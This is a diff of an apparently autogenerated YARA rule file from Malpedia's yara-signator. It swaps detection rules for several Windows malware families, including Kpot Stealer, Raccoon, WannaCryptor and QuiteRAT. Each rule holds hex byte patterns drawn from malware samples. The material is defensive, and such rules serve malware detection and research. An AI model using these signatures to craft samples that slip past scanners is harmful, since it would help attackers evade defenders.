+		$sequence_1 = { 1308 03 6f0b00000a 6f1c00000a 1107 16 }
+		$sequence_2 = { 26 25 6f2800000a 72b1010070 }
+		$sequence_3 = { 19 91 1f47 3329 }
+		$sequence_4 = { 3341 1107 17 91 1f50 3339 }
+		$sequence_5 = { 1f0a 9d 6f0a00000a 1304 03 6f0b00000a }
+		$sequence_6 = { de00 03 6f0800000a 6f0e00000a }
+		$sequence_7 = { 3309 72e3000070 1308 2b5a 1107 }
+		$sequence_8 = { 16 91 2089000000 3341 }
+		$sequence_9 = { 7e01000004 7211010070 1109 6f2200000a de00 03 6f0b00000a }
 
 	condition:
-		7 of them and filesize < 671744
+		7 of them and filesize < 50176
 }
-rule MALPEDIA_Win_Sepulcher_Auto : FILE
+rule MALPEDIA_Win_Atlas_Agent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "802dcce7-e6b4-5d4a-a31c-1fbaf1e1892c"
+		id = "12437137-122e-5647-b916-3934d94f17a9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sepulcher_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atlas_agent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atlas_agent_auto.yar#L1-L144"
 		license_url = "N/A"
-		logic_hash = "5e68d8ea35ea7e66861512d33b8203bcd0ab7d3eb1395ac8fae23afff0a1b2a5"
+		logic_hash = "bddbc52b224832b6d1899d8a7f9c2269559750eebdc1985f06284557268eff24"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107817,32 +108216,36 @@ rule MALPEDIA_Win_Sepulcher_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6828080000 33ff 8d85ccf7ffff 57 50 }
-		$sequence_1 = { 0fb77124 8b11 668b450c 668944b202 }
-		$sequence_2 = { 56 53 e8???????? 85c0 743d 6a00 }
-		$sequence_3 = { e8???????? 894608 8b857cffffff 6a3c 894620 8d459c 6a00 }
-		$sequence_4 = { 668984247e6e0000 0f1184241c6e0000 c784242c6e000006000000 c78424306e000009000000 }
-		$sequence_5 = { 668975dc 668975e2 668975e4 66c745ac756d c645ae62 8855af }
-		$sequence_6 = { 88043e 46 3c3e 752f 83fe05 7235 }
-		$sequence_7 = { 6a00 8d4df8 51 6a01 8d4dff 51 50 }
-		$sequence_8 = { 8b048550de0110 f644082801 7406 8b440818 5d c3 e8???????? }
-		$sequence_9 = { e8???????? 59 8d8c24a0250000 e8???????? 68f2030000 }
+		$sequence_0 = { 0fb60c0a 83e13c c1f902 03c1 }
+		$sequence_1 = { 8bc1 99 b903000000 f7f9 c1e002 }
+		$sequence_2 = { 8a80c0ba0410 84c0 7f1f 8bce }
+		$sequence_3 = { 8a55fe 8810 8d4508 50 }
+		$sequence_4 = { 8a55f3 8855f1 0fb645f1 85c0 746c 68???????? 8d4dd8 }
+		$sequence_5 = { 8a5de3 8b0495e0b50410 885c012e 8b0495e0b50410 }
+		$sequence_6 = { 57 4883ec20 8bfa 4c8d0d517f0100 }
+		$sequence_7 = { 57 4883ec20 488d1daf180300 488d3da8180300 eb12 488b03 }
+		$sequence_8 = { 57 4883ec20 8bda 4c8d0d35810100 }
+		$sequence_9 = { 57 4883ec20 8bf9 e8???????? 4885c0 7509 488d0533ed0200 }
+		$sequence_10 = { 8a55ff 8810 8b45ec 83c001 }
+		$sequence_11 = { 57 4883ec20 4c8bda 488d2d5737fdff }
+		$sequence_12 = { 8a55ff 8811 8b45f4 50 e8???????? 83c404 8945f0 }
+		$sequence_13 = { 57 4883ec20 488d1ddb180300 488d3dd4180300 }
 
 	condition:
-		7 of them and filesize < 279552
+		7 of them and filesize < 857088
 }
-rule MALPEDIA_Win_Daxin_Auto : FILE
+rule MALPEDIA_Win_Nymaim2_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "87cbb543-e190-5544-9083-2d59abd8b683"
+		id = "9d42ecfd-461f-543d-9a58-ba44ed0f874f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daxin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.daxin_auto.yar#L1-L148"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nymaim2_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "e656f3948a2ac7b99eaa279f9e6a2040cdd5d22a79f30ee80aef3c1f7f763afa"
+		logic_hash = "e64916e16c04fec69a155375e17360cf8ab01eed1bdb9780112b275d8e2ffaa7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107856,37 +108259,32 @@ rule MALPEDIA_Win_Daxin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2bc2 d1f8 99 f7f9 }
-		$sequence_1 = { 418b5b3c 418b6b38 e8???????? 85db }
-		$sequence_2 = { 0fb7c0 0bc8 2b8bd0000000 85c9 0f8eec000000 }
-		$sequence_3 = { 488bf0 4885c0 0f8467ffffff 33d2 41b8e0000000 }
-		$sequence_4 = { 66f7d8 1bc0 f7d8 83c003 eb15 }
-		$sequence_5 = { 4533c0 498bcb e8???????? 668bd8 6641895b0a }
-		$sequence_6 = { 740a 8b02 23c1 23cf }
-		$sequence_7 = { 0f8cd8000000 ff15???????? 4c8b4f28 4533c0 884708 }
-		$sequence_8 = { b930000000 33c0 8bfd 66c74664ffff }
-		$sequence_9 = { 57 8908 894804 894808 8b15???????? }
-		$sequence_10 = { b930000000 33c0 8bfb 33f6 }
-		$sequence_11 = { 0f85d8000000 668b4702 663b442412 0f85c9000000 668b4f04 }
-		$sequence_12 = { 8b442412 668b4c2414 66894c2412 6689442414 }
-		$sequence_13 = { 03c7 894e04 8b4e1c 3bc1 c7462400000000 }
-		$sequence_14 = { 0bc1 8d0440 c1e003 8b88c4380f00 85c9 }
+		$sequence_0 = { 8bf9 be???????? 56 8d5f14 e8???????? 59 }
+		$sequence_1 = { 33c0 eb07 8b07 8b4004 03c7 83480c04 8b07 }
+		$sequence_2 = { ff5008 51 8d4604 8bcc 896508 50 e8???????? }
+		$sequence_3 = { 5b c1f805 d3e3 8d0486 0918 8b45e8 8b5df0 }
+		$sequence_4 = { ff4008 8b06 397808 75c2 ff400c ebbd 8b5620 }
+		$sequence_5 = { 885dfc e8???????? 8d4e24 e8???????? 83ec18 8bcc 8965ec }
+		$sequence_6 = { 8d45e4 53 50 ff15???????? 6a01 8d4de4 c645fc02 }
+		$sequence_7 = { 51 56 8bf1 8975f0 c706???????? 8d4e64 c745fc04000000 }
+		$sequence_8 = { 8b00 23c7 3b02 894514 7d58 8b5508 8d1482 }
+		$sequence_9 = { e8???????? 50 8d4d08 e8???????? 85c0 0f9dc3 8d4d9c }
 
 	condition:
-		7 of them and filesize < 3475456
+		7 of them and filesize < 753664
 }
-rule MALPEDIA_Win_Gup_Proxy_Auto : FILE
+rule MALPEDIA_Win_Wannacryptor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bddfea2f-5980-50a2-824f-c8c992e61d4b"
+		id = "01aa6919-6be4-5745-a8e3-92d4cccf9097"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gup_proxy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gup_proxy_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wannacryptor_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "a31779681620c829a24a1dd7ede13a209b88a3ec71308cbcd7be1ef7e190536a"
+		logic_hash = "7ff7fdcfef87dab5f03024d09ebe3e1d6a9751642113edcd42b1cf950ced5962"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107900,32 +108298,32 @@ rule MALPEDIA_Win_Gup_Proxy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 660f6f05???????? f30f7f854cfaffff 660f6f05???????? f30f7f855cfaffff 660f6f05???????? }
-		$sequence_1 = { 8bc1 8b4df8 5e 33cd 5b e8???????? 8be5 }
-		$sequence_2 = { 8b4dfc f7d2 5f 5e 33cd 8bc2 5b }
-		$sequence_3 = { 8b5d08 8d85e0f5ffff 56 57 8bf1 8995dcf5ffff }
-		$sequence_4 = { eb83 890cb510974100 013d???????? 8b04b510974100 0500080000 3bc8 }
-		$sequence_5 = { 8bce e8???????? 6a04 8d8588feffff c78588feffffc22eab48 50 }
-		$sequence_6 = { c7461000000000 7204 8b06 eb02 8bc6 c60000 837e1410 }
-		$sequence_7 = { f30f7f45e8 6a50 8bf9 668945e8 }
-		$sequence_8 = { 88858afeffff 8bc3 c1e808 888589feffff 8d8588feffff }
-		$sequence_9 = { f30f7f853cffffff 660f6f05???????? f30f7f854cffffff 660f6f05???????? }
+		$sequence_0 = { e8???????? 85c0 7403 8b4004 50 8b442428 }
+		$sequence_1 = { c744243802000000 e8???????? 55 8d4c2420 b303 50 51 }
+		$sequence_2 = { 8d7e44 85c0 755f 8b17 8d4c241c 6a01 51 }
+		$sequence_3 = { 7d0d 8b5168 8b7960 03d7 }
+		$sequence_4 = { c644243404 e8???????? 8d4c241c 885c2430 }
+		$sequence_5 = { 8d542418 c744243005000000 8b41f8 8b4e74 2bc1 }
+		$sequence_6 = { 8a02 8bcf 88442418 e8???????? 8b542410 c744243000000000 }
+		$sequence_7 = { c7442430ffffffff e8???????? e9???????? 85c0 754b }
+		$sequence_8 = { 88442418 e8???????? 8b542410 c744243000000000 52 50 8d442420 }
+		$sequence_9 = { 89442418 0f8c42ffffff 8b442438 5f 85c0 }
 
 	condition:
-		7 of them and filesize < 247808
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Alice_Atm_Auto : FILE
+rule MALPEDIA_Win_Kpot_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9cfa3195-b227-51b9-a69c-03c48bd5ea46"
+		id = "2d1c2c52-a27f-577a-ba10-9c57d7ba8b38"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.alice_atm_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kpot_stealer_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "0ef9f8a95dbcda5f31fa4765cc9c970db5415f8125e940fffc88bdbab240fbed"
+		logic_hash = "c16845199544fc6722c4e2fc31a24b6089435ba431e0486f2fdbb3a3dff70b56"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107939,32 +108337,32 @@ rule MALPEDIA_Win_Alice_Atm_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 682e010000 ff7110 e8???????? 8bd8 }
-		$sequence_1 = { 0bc0 0f841b010000 b910000000 33d2 f7f1 0fb7f8 }
-		$sequence_2 = { 0f85b7000000 e8???????? ff7508 8f05???????? 68ea030000 }
-		$sequence_3 = { 53 e8???????? e9???????? 817d0c11010000 0f858b000000 8b4d10 6681f9d507 }
-		$sequence_4 = { 7434 8d75d4 6a28 56 }
-		$sequence_5 = { 68ec030000 ff7508 e8???????? 8bf0 }
-		$sequence_6 = { 55 8bec 81c4f4fdffff 53 56 57 33ff }
-		$sequence_7 = { 33c0 8945fc 8b5d08 0bdb 7414 6a00 6a00 }
-		$sequence_8 = { 6a00 68e8030000 ff35???????? e8???????? }
-		$sequence_9 = { f7f1 0fb7c0 8945f8 8b7d10 83ff00 0f86c2000000 3b7df8 }
+		$sequence_0 = { 0bce 0fb67007 0fb64006 c1e608 }
+		$sequence_1 = { 8b4608 8b0e ff3481 ff15???????? 8b4608 8b4e04 }
+		$sequence_2 = { d1e8 8bc8 81e100000007 8bd8 }
+		$sequence_3 = { 8a02 3c2d 7506 33ff 47 42 eb07 }
+		$sequence_4 = { 59 8d4df8 51 ff75f8 }
+		$sequence_5 = { 57 8bf8 8b4518 0fb67005 }
+		$sequence_6 = { 0bd1 8bcf c1e11b d1ef }
+		$sequence_7 = { 8bd6 e8???????? c6043700 8bc7 5f }
+		$sequence_8 = { 8a07 84c0 7417 8a0c3a 47 3ac8 74f2 }
+		$sequence_9 = { 53 56 57 8bf8 8b4518 0fb67005 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 219136
 }
-rule MALPEDIA_Win_Darkloader_Auto : FILE
+rule MALPEDIA_Win_Asprox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ad9df5bd-cb17-5a57-841e-d7169dd29ac7"
+		id = "760d5ba5-eb2e-56fe-8b68-64c041182dd0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkloader_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.asprox_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "0e3b5f14c9565dba5f89e209f471d5ea4bec46d1f1cc2d6a50fe986d74ec01f7"
+		logic_hash = "0433055da9e2395dd1bdc28ed8f399d8aecafba94a64506b61f0a5f3795ff961"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107978,32 +108376,32 @@ rule MALPEDIA_Win_Darkloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8365fc00 ff15???????? 59 85c0 b9???????? }
-		$sequence_1 = { 68???????? ffb7dc010000 8987d4010000 ffd6 }
-		$sequence_2 = { 83f9ff 75bb 8bb42424020000 8dbe10a10010 ff742418 e8???????? 59 }
-		$sequence_3 = { 8931 e8???????? 83c410 33c0 40 ebaf 83ec18 }
-		$sequence_4 = { 8b01 ff90d0000000 83f809 7555 }
-		$sequence_5 = { 68???????? eb38 8d042f 50 e8???????? }
-		$sequence_6 = { 56 57 e8???????? 8bd8 59 59 85ff }
-		$sequence_7 = { ffb7dc010000 894704 ffd6 68???????? }
-		$sequence_8 = { 6a08 8bf8 be???????? 59 8d442414 f3a5 }
-		$sequence_9 = { a3???????? 5e c3 55 8bec 81ec04040000 33c9 }
+		$sequence_0 = { 8955d4 eb05 e9???????? 8b45d4 898538ffffff c6459447 }
+		$sequence_1 = { e9???????? 8b03 83780400 0f84fe070000 8b10 0fb612 8b4b1c }
+		$sequence_2 = { 038cfe94c90000 0394fe98c90000 668945d0 c1e810 66894dd4 c1e910 668955d8 }
+		$sequence_3 = { c645f300 6800100000 6a00 a1???????? 50 ff15???????? 8945f8 }
+		$sequence_4 = { 49 7407 33c0 e9???????? 3bd3 0f858d000000 8b4e0c }
+		$sequence_5 = { e8???????? 83c414 8b55e8 8955f0 c745e400000000 6a10 8d45e4 }
+		$sequence_6 = { 895e04 40 eb20 8bc3 eb1c e8???????? }
+		$sequence_7 = { 52 8b45fc 50 ff15???????? 83c408 68???????? 8b4dfc }
+		$sequence_8 = { 51 8b952cffffff 52 ff15???????? 898558ffffff 8b8560ffffff 898570ffffff }
+		$sequence_9 = { 6a00 8b55e4 52 ff15???????? 8a45fb 8be5 }
 
 	condition:
-		7 of them and filesize < 124928
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Krbanker_Auto : FILE
+rule MALPEDIA_Win_Raccoon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d85e7258-981d-5cc6-a33a-cbcdd663368d"
+		id = "426735cd-205f-5856-956c-bf7b885a57ea"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.krbanker_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.raccoon_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "e566b2d91c9e72b8d03a6b5c791e4e71a6dc723cd18d0207fd049c63356700fa"
+		logic_hash = "30039f1e9ada41f0fa18f5ba2d7fb988ae243b357b509d0986ea0785e88878da"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108017,32 +108415,32 @@ rule MALPEDIA_Win_Krbanker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895500 8b4104 894504 8b5108 895508 8b410c }
-		$sequence_1 = { 6a00 6a00 6801030080 6a00 6802000000 6805000080 }
-		$sequence_2 = { 23d0 8954244c eb08 c744244cffffffff 8d4c2424 }
-		$sequence_3 = { bb40010000 e8???????? 83c410 8945d0 ff75d0 ff75d4 }
-		$sequence_4 = { 8955e0 8d55d4 52 6a01 50 51 }
-		$sequence_5 = { e8???????? 47 4b 3bdd 0f8d5bffffff eb02 8bde }
-		$sequence_6 = { 75a4 dd442410 e8???????? 8ad8 }
-		$sequence_7 = { c3 8b4c2420 8b542404 8d442408 50 51 }
-		$sequence_8 = { 50 8b5dec 8b1b 85db 7409 }
-		$sequence_9 = { 0faffa 46 3bf0 76cf }
+		$sequence_0 = { 53 ff75f8 c745fcff070000 ff15???????? 85c0 7488 }
+		$sequence_1 = { e8???????? e9???????? 8d45f0 c645f001 51 50 }
+		$sequence_2 = { 7403 832700 8b5d14 33f6 83fb01 7507 }
+		$sequence_3 = { 394708 7417 684c0e0000 68???????? 68???????? }
+		$sequence_4 = { 51 8bc2 8945fc 56 8bf1 }
+		$sequence_5 = { 8d4dfc 51 8d4df8 c745ec02000000 51 }
+		$sequence_6 = { 56 57 e8???????? 83c414 ff75f4 ff15???????? }
+		$sequence_7 = { 8d45ec c706???????? 50 53 ff75e4 895dec ff15???????? }
+		$sequence_8 = { 8d55cc ff75cc 52 ff5024 807dcc00 6a04 58 }
+		$sequence_9 = { 8975e4 894df0 33c0 40 8945fc }
 
 	condition:
-		7 of them and filesize < 1826816
+		7 of them and filesize < 1212416
 }
-rule MALPEDIA_Win_Rhino_Auto : FILE
+rule MALPEDIA_Win_Solarbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "301844bb-5a4f-5171-97e6-f16bb6b6ee32"
+		id = "05e274f3-e1a5-5d28-b9c3-6c8b8c413847"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rhino_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.solarbot_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "5ce22b89951420015e2398779d8c31359ab3803912d8b24c1d8c37a7a67db86a"
+		logic_hash = "531287eb552516451607fb4943bd4268dc00786ea51d0ac858b62961b07eaa85"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108056,34 +108454,34 @@ rule MALPEDIA_Win_Rhino_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3944240c 760a f71487 40 3b44240c 72f6 }
-		$sequence_1 = { 8bc7 c1c806 33c8 8b44242c 33442420 23c7 3344242c }
-		$sequence_2 = { 8d45d8 50 6a06 8bce e8???????? 6a00 6a01 }
-		$sequence_3 = { 03c1 8b4c2420 83d500 894114 8b470c f7e0 }
-		$sequence_4 = { 8d45d0 50 e8???????? e8???????? c20800 8b5114 }
-		$sequence_5 = { 83ec78 8d6c24fc a1???????? 33c5 894578 6a14 b8???????? }
-		$sequence_6 = { 53 53 6800000008 51 53 53 56 }
-		$sequence_7 = { 68???????? 50 e8???????? 83c40c 8365fc00 8bce 50 }
-		$sequence_8 = { 8b06 ff5048 85c0 0f849c000000 807c241006 0f8591000000 57 }
-		$sequence_9 = { 8b5528 0f1101 034c241c 836c242801 89442410 894c2414 758a }
+		$sequence_0 = { c745f800000000 6a00 8d55fc 52 89da 8b0a }
+		$sequence_1 = { 8945fc 8b7d14 8b4518 8945f4 8b451c c745ec00000000 6a00 }
+		$sequence_2 = { 8b55f8 01d0 50 8b55fc 8b45f8 01c2 52 }
+		$sequence_3 = { 8b85f8feffff 8b5020 0395f0feffff 89d8 c1e002 01c2 }
+		$sequence_4 = { 8b8524f8ffff 0fb610 83fa50 0f8598000000 83bd20f8ffff21 0f868b000000 }
+		$sequence_5 = { 89ca 8d1453 0fb712 85d2 7ff3 89c8 }
+		$sequence_6 = { 8945a8 e9???????? ff75a4 ff75e0 681a040000 }
+		$sequence_7 = { 0f8580020000 8b85d0fdffff 85c0 0f8472020000 c785e0fdffff00000000 bf00000000 be00000000 }
+		$sequence_8 = { 8945e0 eb2d 6a1c 8d45e4 50 }
+		$sequence_9 = { 50 e8???????? 89c3 53 e8???????? 8945f4 89f0 }
 
 	condition:
-		7 of them and filesize < 1288192
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Matryoshka_Rat_Auto : FILE
+rule MALPEDIA_Win_Rm3_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e67f9b00-164c-59e2-9dc8-5dd2e0d5203f"
+		id = "ae32a8ae-4008-5a29-ba53-9431479c4978"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.matryoshka_rat_auto.yar#L1-L142"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rm3"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rm3_auto.yar#L1-L393"
 		license_url = "N/A"
-		logic_hash = "e984417b389a4155a102710aa04d6d8dad2d1f007db82c883ebc84c4c1b44825"
+		logic_hash = "04a502f8c76326d2d2ff87950393542f221575ef954be32116492ddddf4bc28b"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -108095,36 +108493,62 @@ rule MALPEDIA_Win_Matryoshka_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b037 c3 b073 c3 }
-		$sequence_1 = { c3 b06f c3 b063 c3 }
-		$sequence_2 = { 8b46fc 8947fc 49 75ed }
-		$sequence_3 = { 750a 488bcb e8???????? eb0f 488bd3 488d0df7520400 }
-		$sequence_4 = { 7509 bb99ffffff 85db 740d 488bcf }
-		$sequence_5 = { 8b4648 48 48 7446 48 }
-		$sequence_6 = { 750a 4883c310 0fba2f11 eb27 41b807000000 488d152bb50200 }
-		$sequence_7 = { 8b4704 8b3491 890491 8bd6 }
-		$sequence_8 = { 750a 443b774c 8d4399 0f45d8 450137 }
-		$sequence_9 = { 750a 4883c30a 0fba2f12 eb4a 41b808000000 488d153eb50200 }
-		$sequence_10 = { 8b4704 8bf1 33d1 81e6ff030000 }
-		$sequence_11 = { 8b4660 89471c 8d4670 894724 }
-		$sequence_12 = { 8b4664 034668 8b4e60 03ca }
-		$sequence_13 = { 7509 c7412400000002 eb4c 48394130 }
+		$sequence_0 = { 8b483c 03c8 0fb74106 8365f800 }
+		$sequence_1 = { 897104 8b4808 ff7004 034c240c 8b00 51 }
+		$sequence_2 = { 7303 8975f8 8b45f8 83c628 ff4dfc 85c0 7505 }
+		$sequence_3 = { 53 8945fc 0fb74114 56 57 8d740818 }
+		$sequence_4 = { 8b4508 3b460c 7247 8b7938 8b4608 8b513c }
+		$sequence_5 = { 56 57 8d740818 8b4508 3b460c 7247 }
+		$sequence_6 = { 8b460c 03c2 394508 7303 8975f8 8b45f8 }
+		$sequence_7 = { f7d2 23fa 3bf8 7609 8b413c 8d5418ff }
+		$sequence_8 = { 8bec 51 837d0804 53 56 6a57 }
+		$sequence_9 = { 8bf0 6a08 8d7e10 5a 8bc7 8d4df8 e8???????? }
+		$sequence_10 = { 56 57 8bd8 8bf9 8db5f0feffff 8bce 8d041b }
+		$sequence_11 = { 8bc6 e8???????? 56 ff7510 8d8df4feffff 51 ff7508 }
+		$sequence_12 = { 51 8365fc00 56 8d4508 50 6a08 }
+		$sequence_13 = { e8???????? ff7518 8d8578ffffff 50 50 8bc8 e8???????? }
+		$sequence_14 = { 8d856cfeffff ff750c 8d8de8fdffff 50 e8???????? ff7518 }
+		$sequence_15 = { 8bc6 e8???????? 6a58 6a00 56 e8???????? 83c40c }
+		$sequence_16 = { 4883ec30 488b05???????? 4c8ba42480000000 498bf1 4c8b90b0000000 }
+		$sequence_17 = { 4833d0 488bc2 48c1e81b 4833d0 488bc2 480fafc3 488901 }
+		$sequence_18 = { 4883ec50 418bf0 4c8b05???????? 498bf9 4d8b80c8000000 488bea 4c8d48d8 }
+		$sequence_19 = { 4c8d443b80 488d48b8 488d5098 e8???????? 85c0 0f84f0000000 8b4c2470 }
+		$sequence_20 = { 3c41 7204 3c5a 763e 3c61 7204 3c7a }
+		$sequence_21 = { ff15???????? 85c0 8bd8 0f8560020000 8a442431 3c02 }
+		$sequence_22 = { 4885c0 488bd8 742f 8d4f01 448bce }
+		$sequence_23 = { 488bc3 48c1e80c 4833d8 488bc3 48c1e019 4833d8 488bc3 }
+		$sequence_24 = { eb0a 8b45ec 83c410 5e 5f }
+		$sequence_25 = { 8945e8 7442 ebcf 8b45dc b931000000 8b15???????? }
+		$sequence_26 = { 83ec28 31c0 31c9 8945fc }
+		$sequence_27 = { e8???????? 8d0d84308702 31d2 8b75f0 89460c 890c24 }
+		$sequence_28 = { 8b4dec 89c2 83c201 89ce }
+		$sequence_29 = { 31c9 ba03000000 8d75f1 83ec0c }
+		$sequence_30 = { 8d95f1fbffff c785ecfbffff00000000 8db5ecfbffff 8b3d???????? 56 68ff030000 52 }
+		$sequence_31 = { 8995d8fbffff 89b5d4fbffff e8???????? 83c40c 8b85d4fbffff 50 e8???????? }
+		$sequence_32 = { 8b7138 891424 c744240400000000 89742408 8945dc e8???????? 8b45e0 }
+		$sequence_33 = { 894de0 0f84ca000000 8b45cc 8b08 8b55ec 035010 }
+		$sequence_34 = { 8b4048 8945b0 8b45b4 8b4040 8945ac }
+		$sequence_35 = { 51 ffd0 8b0d???????? 8b95e4fbffff }
+		$sequence_36 = { 8b8dccfbffff 51 8bb5e0fbffff 56 }
+		$sequence_37 = { 89442404 c744240800000000 8954240c 8b4590 894d80 ffd0 }
+		$sequence_38 = { 89cf 83c710 89957cffffff 898d78ffffff 89bd74ffffff 89b570ffffff }
+		$sequence_39 = { 890c24 c744240400000000 8955dc e8???????? 8d0d77318702 890424 894c2404 }
 
 	condition:
-		7 of them and filesize < 843776
+		7 of them and filesize < 221184
 }
-rule MALPEDIA_Win_Anatova_Ransom_Auto : FILE
+rule MALPEDIA_Win_Quiterat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c0fa9d6b-6c59-5a94-9c37-0c291299bb78"
+		id = "43a5ead4-80ee-505e-8349-ccdf5ab70f14"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.anatova_ransom_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quiterat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.quiterat_auto.yar#L1-L134"
 		license_url = "N/A"
